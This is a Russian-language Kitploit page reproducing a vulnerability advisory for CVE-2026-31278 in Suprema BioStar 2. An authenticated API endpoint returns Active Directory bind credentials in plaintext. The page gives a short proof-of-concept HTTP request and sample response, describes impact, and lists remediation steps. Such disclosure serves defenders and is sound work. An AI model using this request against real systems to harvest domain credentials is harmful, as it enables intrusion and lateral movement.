Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-31278 — Разбор CVE уязвимости раскрытия учетных данных Active Directory в Suprema BioStar 2 | Kitploit
Инструменты/GitHubGitHub/mda1r/cve-2026-31278
Сканеры уязвимостейАтаки на ПаролиЭксплуатацияВеб-безопасностьСетевая безопасностьСтатьи и Исследования
GitHubmda1r/cve-2026-31278

CVE-2026-31278

Разбор CVE уязвимости раскрытия учетных данных Active Directory в Suprema BioStar 2

Репозиторий
2 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-31278 Suprema BioStar 2: Раскрытие учетных данных Active Directory


Метаданные

ПолеСведения
CVE IDCVE-2026-31278
ВендорSuprema Inc.
ПродуктBioStar 2
Тип уязвимостиРаскрытие конфиденциальной информации / Утечка учетных данных
Вектор атакиУдаленный / Аутентифицированный / Низкая сложность
СерьезностьВысокий
Исправлено вBioStar 2 v2.9.12 / BioStarX v1.0.2
ИсследовательAbdullah Alannaz

Краткое описание

Уязвимость раскрытия конфиденциальной информации существует в Suprema BioStar 2 из-за неправильной обработки настроек интеграции с Active Directory. Конечная точка внутреннего API /api/v2/setting/adserversetting возвращает учетные данные привязки Active Directory в открытом виде, несмотря на то, что пароль маскируется в административном интерфейсе.


Затронутые версии

  • BioStar 2 Core / AC v2.9.5.29
  • BioStar 2 T&A v2.9.5.3

Технические подробности

Хотя поле пароля маскируется в административном интерфейсе, аутентифицированные запросы к внутреннему API раскрывают полный незашифрованный пароль вместе с параметрами конфигурации LDAP, включая отключенную SSL-связь.

Аутентифицированный злоумышленник отправляет HTTP GET-запрос к конечной точке конфигурации AD-сервера и получает пароль учетной записи службы Active Directory в открытом виде в ответе сервера.

Подтверждение концепции

Запрос:

root@kitploit:~
GET /api/v2/setting/adserversetting HTTP/1.1
Host: <target>
Authorization: Bearer <token>

Ответ:

root@kitploit:~
{
  "ad_server": "ldap://internal.domain.local",
  "bind_dn": "CN=svc_biostar,DC=domain,DC=local",
  "password": "<plaintext_password_returned_here>",
  "ssl_enabled": false
}

Влияние

Аутентифицированный злоумышленник может использовать раскрытые учетные данные для:

  • Выполнения аутентификации LDAP в Active Directory
  • Перечисления пользователей домена, групп и организационных единиц
  • Проведения разведки внутренней сети
  • Осуществления бокового перемещения по системам, подключенным к домену
  • Потенциального повышения привилегий в зависимости от разрешений учетной записи службы

Хронология

CVE-2026-31278 назначен MITRE | Исправление выпущено BioStar 2 v2.9.12 / BioStarX v1.0.2 |


Устранение

  • Обновитесь до BioStar 2 v2.9.12 или BioStarX v1.0.2
  • Немедленно смените все учетные данные учетных записей служб Active Directory
  • Ограничьте доступ к API только доверенными сегментами сети
  • Включите LDAPS (SSL) для связи с Active Directory

Ссылки

  • Suprema Inc.: https://www.supremainc.com

Благодарность

Abdullah Alannaz Исследователь безопасности

Эта уязвимость была ответственно раскрыта компании Suprema. Вендор подтвердил проблему и скоординировался с MITRE для назначения CVE.

Скачать инструмент